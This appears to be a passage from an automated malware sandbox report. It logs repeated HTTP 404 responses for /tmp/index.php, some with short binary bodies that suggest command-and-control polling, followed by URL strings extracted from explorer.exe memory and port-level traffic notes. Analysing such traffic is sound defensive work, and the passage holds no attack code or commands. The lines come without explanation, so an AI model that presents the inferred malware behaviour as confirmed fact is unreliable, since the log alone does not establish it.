65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:15:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:15:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:15:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:16:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
              Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
              Source: explorer.exe, 00000001.00000000.1730664366.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1731843404.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1730287769.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
              Source: explorer.exe, 00000001.00000000.1728453550.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000001.00000000.1731194544.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
              Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000001.00000000.1731194544.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
              Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
              Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
              Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
              Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
